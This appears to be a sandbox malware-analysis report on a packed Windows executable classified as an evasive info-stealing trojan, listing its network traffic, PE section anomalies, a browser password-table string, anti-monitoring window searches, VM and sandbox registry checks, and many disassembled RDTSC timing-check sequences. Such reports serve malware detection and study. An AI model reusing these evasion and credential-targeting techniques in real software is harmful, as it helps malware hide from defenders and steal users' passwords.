            Source: unknownHTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.4:49733 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.4:49734 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.4:49735 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.4:49736 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.4:49701 version: TLS 1.2

            System Summary

            barindex
            PE file contains section with special chars
            Source: file.exeStatic PE information: section name:
            Source: file.exeStatic PE information: section name: .rsrc
            Source: file.exeStatic PE information: section name: .idata
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_006F697C0_3_006F697C
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_006F697C0_3_006F697C
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_006F697C0_3_006F697C
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_006F697C0_3_006F697C
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_006F697C0_3_006F697C
            Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: file.exeStatic PE information: Section: ZLIB complexity 0.9979611579153606
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@4/2
            Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: file.exe, 00000000.00000003.1712664344.000000000510C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: file.exeStatic file information: File size 2921984 > 1048576
            Source: file.exeStatic PE information: Raw size of aqmxsaio is bigger than: 0x100000 < 0x29e000

            Data Obfuscation

            barindex
            Detected unpacking (changes PE section rights)
            Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.840000.0.unpack :EW;.rsrc :W;.idata :W;aqmxsaio:EW;zdfqzxlh:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;aqmxsaio:EW;zdfqzxlh:EW;.taggant:EW;
            Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
            Source: file.exeStatic PE information: real checksum: 0x2d6c84 should be: 0x2ceab4
            Source: file.exeStatic PE information: section name:
            Source: file.exeStatic PE information: section name: .rsrc
            Source: file.exeStatic PE information: section name: .idata
            Source: file.exeStatic PE information: section name: aqmxsaio
            Source: file.exeStatic PE information: section name: zdfqzxlh
            Source: file.exeStatic PE information: section name: .taggant
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_006F9764 push edi; iretd 0_3_006F9767
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_006F7A7B push FFFFFFDBh; iretd 0_3_006F7A8C
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_006FAF08 push ebx; ret 0_3_006FAF09
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_006F7EF9 push esi; retf 0_3_006F7EFC
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_006FA7F8 push esi; retf 0_3_006FA7F9
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_006F7A7B push FFFFFFDBh; iretd 0_3_006F7A8C
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_006F7EF9 push esi; retf 0_3_006F7EFC
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_006F83C0 push ebx; retf 0_3_006F83CC
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_006F9764 push edi; iretd 0_3_006F9767
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_006F7A7B push FFFFFFDBh; iretd 0_3_006F7A8C
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_006FAF08 push ebx; ret 0_3_006FAF09
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_006F7EF9 push esi; retf 0_3_006F7EFC
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_006FA7F8 push esi; retf 0_3_006FA7F9
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_006F9764 push edi; iretd 0_3_006F9767
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_006F7A7B push FFFFFFDBh; iretd 0_3_006F7A8C
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_006FAF08 push ebx; ret 0_3_006FAF09
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_006F7EF9 push esi; retf 0_3_006F7EFC
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_006FA7F8 push esi; retf 0_3_006FA7F9
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_006F9764 push edi; iretd 0_3_006F9767
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_006F7A7B push FFFFFFDBh; iretd 0_3_006F7A8C
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_006FAF08 push ebx; ret 0_3_006FAF09
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_006F7EF9 push esi; retf 0_3_006F7EFC
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_006FA7F8 push esi; retf 0_3_006FA7F9
            Source: file.exeStatic PE information: section name: entropy: 7.97730443522952

            Boot Survival

            barindex
            Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\Desktop\file.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
            Source: C:\Users\user\Desktop\file.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Query firmware table information (likely to detect VMs)
            Source: C:\Users\user\Desktop\file.exeSystem information queried: FirmwareTableInformationJump to behavior
            Tries to detect sandboxes / dynamic malware analysis system (registry check)
            Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
            Tries to detect virtualization through RDTSC time measurements
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89F665 second address: 89F66F instructions: 0x00000000 rdtsc 0x00000002 jl 00007FAD40FC0C56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89F66F second address: 89F679 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FAD40FD6766h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89F679 second address: 89EEC9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FC0C5Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov dword ptr [ebp+122D1C44h], eax 0x00000012 push dword ptr [ebp+122D1461h] 0x00000018 jmp 00007FAD40FC0C68h 0x0000001d call dword ptr [ebp+122D3A2Ch] 0x00000023 pushad 0x00000024 clc 0x00000025 xor eax, eax 0x00000027 jmp 00007FAD40FC0C5Dh 0x0000002c mov edx, dword ptr [esp+28h] 0x00000030 cmc 0x00000031 mov dword ptr [ebp+122D3B1Eh], eax 0x00000037 pushad 0x00000038 mov ecx, dword ptr [ebp+122D3DCAh] 0x0000003e jmp 00007FAD40FC0C61h 0x00000043 popad 0x00000044 mov esi, 0000003Ch 0x00000049 mov dword ptr [ebp+122D1E60h], edi 0x0000004f add esi, dword ptr [esp+24h] 0x00000053 jmp 00007FAD40FC0C62h 0x00000058 lodsw 0x0000005a jmp 00007FAD40FC0C5Bh 0x0000005f add eax, dword ptr [esp+24h] 0x00000063 cld 0x00000064 mov ebx, dword ptr [esp+24h] 0x00000068 pushad 0x00000069 mov dh, ch 0x0000006b add esi, dword ptr [ebp+122D3D46h] 0x00000071 popad 0x00000072 nop 0x00000073 push eax 0x00000074 jbe 00007FAD40FC0C67h 0x0000007a jmp 00007FAD40FC0C61h 0x0000007f pop eax 0x00000080 push eax 0x00000081 push ebx 0x00000082 pushad 0x00000083 pushad 0x00000084 popad 0x00000085 push eax 0x00000086 push edx 0x00000087 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A11BF8 second address: A11BFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A11BFC second address: A11C10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FAD40FC0C5Eh 0x0000000c jnp 00007FAD40FC0C56h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A12E39 second address: A12E3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A12E3D second address: A12E43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A12E43 second address: 89EEC9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FAD40FD6772h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b add dword ptr [esp], 36092C5Bh 0x00000012 mov dword ptr [ebp+122D2C3Fh], ecx 0x00000018 jc 00007FAD40FD6769h 0x0000001e movzx edi, bx 0x00000021 push dword ptr [ebp+122D1461h] 0x00000027 xor ecx, 325333A3h 0x0000002d call dword ptr [ebp+122D3A2Ch] 0x00000033 pushad 0x00000034 clc 0x00000035 xor eax, eax 0x00000037 jmp 00007FAD40FD676Dh 0x0000003c mov edx, dword ptr [esp+28h] 0x00000040 cmc 0x00000041 mov dword ptr [ebp+122D3B1Eh], eax 0x00000047 pushad 0x00000048 mov ecx, dword ptr [ebp+122D3DCAh] 0x0000004e jmp 00007FAD40FD6771h 0x00000053 popad 0x00000054 mov esi, 0000003Ch 0x00000059 mov dword ptr [ebp+122D1E60h], edi 0x0000005f add esi, dword ptr [esp+24h] 0x00000063 jmp 00007FAD40FD6772h 0x00000068 lodsw 0x0000006a jmp 00007FAD40FD676Bh 0x0000006f add eax, dword ptr [esp+24h] 0x00000073 cld 0x00000074 mov ebx, dword ptr [esp+24h] 0x00000078 pushad 0x00000079 mov dh, ch 0x0000007b add esi, dword ptr [ebp+122D3D46h] 0x00000081 popad 0x00000082 nop 0x00000083 push eax 0x00000084 jbe 00007FAD40FD6777h 0x0000008a jmp 00007FAD40FD6771h 0x0000008f pop eax 0x00000090 push eax 0x00000091 push ebx 0x00000092 pushad 0x00000093 pushad 0x00000094 popad 0x00000095 push eax 0x00000096 push edx 0x00000097 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A12F83 second address: A12F87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A12F87 second address: A12FC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 jo 00007FAD40FD6774h 0x0000000e pushad 0x0000000f push esi 0x00000010 pop esi 0x00000011 jmp 00007FAD40FD676Ah 0x00000016 popad 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b pushad 0x0000001c jmp 00007FAD40FD6771h 0x00000021 jc 00007FAD40FD676Ch 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A12FC1 second address: A12FCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [eax] 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A12FCD second address: A12FD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A130A5 second address: A13174 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push ebp 0x00000009 call 00007FAD40FC0C58h 0x0000000e pop ebp 0x0000000f mov dword ptr [esp+04h], ebp 0x00000013 add dword ptr [esp+04h], 0000001Dh 0x0000001b inc ebp 0x0000001c push ebp 0x0000001d ret 0x0000001e pop ebp 0x0000001f ret 0x00000020 mov edi, 669D1B5Eh 0x00000025 mov cx, bx 0x00000028 push 00000000h 0x0000002a mov dl, bh 0x0000002c push FC8AC8E6h 0x00000031 pushad 0x00000032 jmp 00007FAD40FC0C65h 0x00000037 jnc 00007FAD40FC0C6Bh 0x0000003d popad 0x0000003e add dword ptr [esp], 0375379Ah 0x00000045 jmp 00007FAD40FC0C64h 0x0000004a push 00000003h 0x0000004c movzx ecx, cx 0x0000004f push 00000000h 0x00000051 mov esi, dword ptr [ebp+122D2C95h] 0x00000057 push 00000003h 0x00000059 or dword ptr [ebp+122D1E36h], edi 0x0000005f call 00007FAD40FC0C59h 0x00000064 pushad 0x00000065 jmp 00007FAD40FC0C5Dh 0x0000006a jmp 00007FAD40FC0C62h 0x0000006f popad 0x00000070 push eax 0x00000071 push ecx 0x00000072 pushad 0x00000073 pushad 0x00000074 popad 0x00000075 push eax 0x00000076 push edx 0x00000077 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A13174 second address: A1318A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jc 00007FAD40FD6766h 0x00000015 popad 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1318A second address: A1319F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c jns 00007FAD40FC0C5Eh 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1319F second address: A131C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007FAD40FD6779h 0x00000011 jmp 00007FAD40FD6773h 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A131C3 second address: A13224 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FAD40FC0C6Fh 0x00000008 jmp 00007FAD40FC0C69h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop eax 0x00000010 mov dword ptr [ebp+122D3977h], edi 0x00000016 lea ebx, dword ptr [ebp+12447D77h] 0x0000001c jmp 00007FAD40FC0C62h 0x00000021 add edx, dword ptr [ebp+122D26C5h] 0x00000027 xchg eax, ebx 0x00000028 push ecx 0x00000029 push eax 0x0000002a push edi 0x0000002b pop edi 0x0000002c pop eax 0x0000002d pop ecx 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FAD40FC0C5Fh 0x00000036 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A132F2 second address: A1333B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FD676Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d ja 00007FAD40FD6770h 0x00000013 mov eax, dword ptr [eax] 0x00000015 push esi 0x00000016 pushad 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 jmp 00007FAD40FD6775h 0x0000001e popad 0x0000001f pop esi 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 push ebx 0x00000028 pop ebx 0x00000029 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1333B second address: A1333F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1333F second address: A13377 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jl 00007FAD40FD6766h 0x0000000d pop edx 0x0000000e popad 0x0000000f pop eax 0x00000010 add dword ptr [ebp+122D25ABh], esi 0x00000016 push 00000003h 0x00000018 mov dword ptr [ebp+122D362Eh], esi 0x0000001e push 00000000h 0x00000020 mov dx, ax 0x00000023 push 00000003h 0x00000025 mov dx, bx 0x00000028 mov ecx, esi 0x0000002a call 00007FAD40FD6769h 0x0000002f push ebx 0x00000030 push eax 0x00000031 push edx 0x00000032 push edx 0x00000033 pop edx 0x00000034 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2503F second address: A25049 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FAD40FC0C56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A25049 second address: A25058 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAD40FD676Bh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A33739 second address: A33743 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop ebx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3161F second address: A31625 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A317AA second address: A317B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A31AA6 second address: A31ABF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FD6775h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A31ABF second address: A31AC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A31C3A second address: A31C3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A32782 second address: A32786 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A32786 second address: A327A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FD6778h 0x00000007 jbe 00007FAD40FD6766h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A32FDB second address: A32FE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A33305 second address: A33309 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A33309 second address: A33312 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A335CF second address: A335D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A335D7 second address: A335DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A335DC second address: A335F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FD676Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007FAD40FD677Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 jp 00007FAD40FD6766h 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A335F8 second address: A335FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A35A0B second address: A35A11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A35A11 second address: A35A17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A35A17 second address: A35A27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a jns 00007FAD40FD6766h 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A35A27 second address: A35A3A instructions: 0x00000000 rdtsc 0x00000002 ja 00007FAD40FC0C56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A35A3A second address: A35A3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A35A3E second address: A35A42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A35A42 second address: A35A48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A39594 second address: A3959E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FAD40FC0C56h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3E490 second address: A3E494 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3E494 second address: A3E4A1 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FAD40FC0C56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3E7B7 second address: A3E7BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
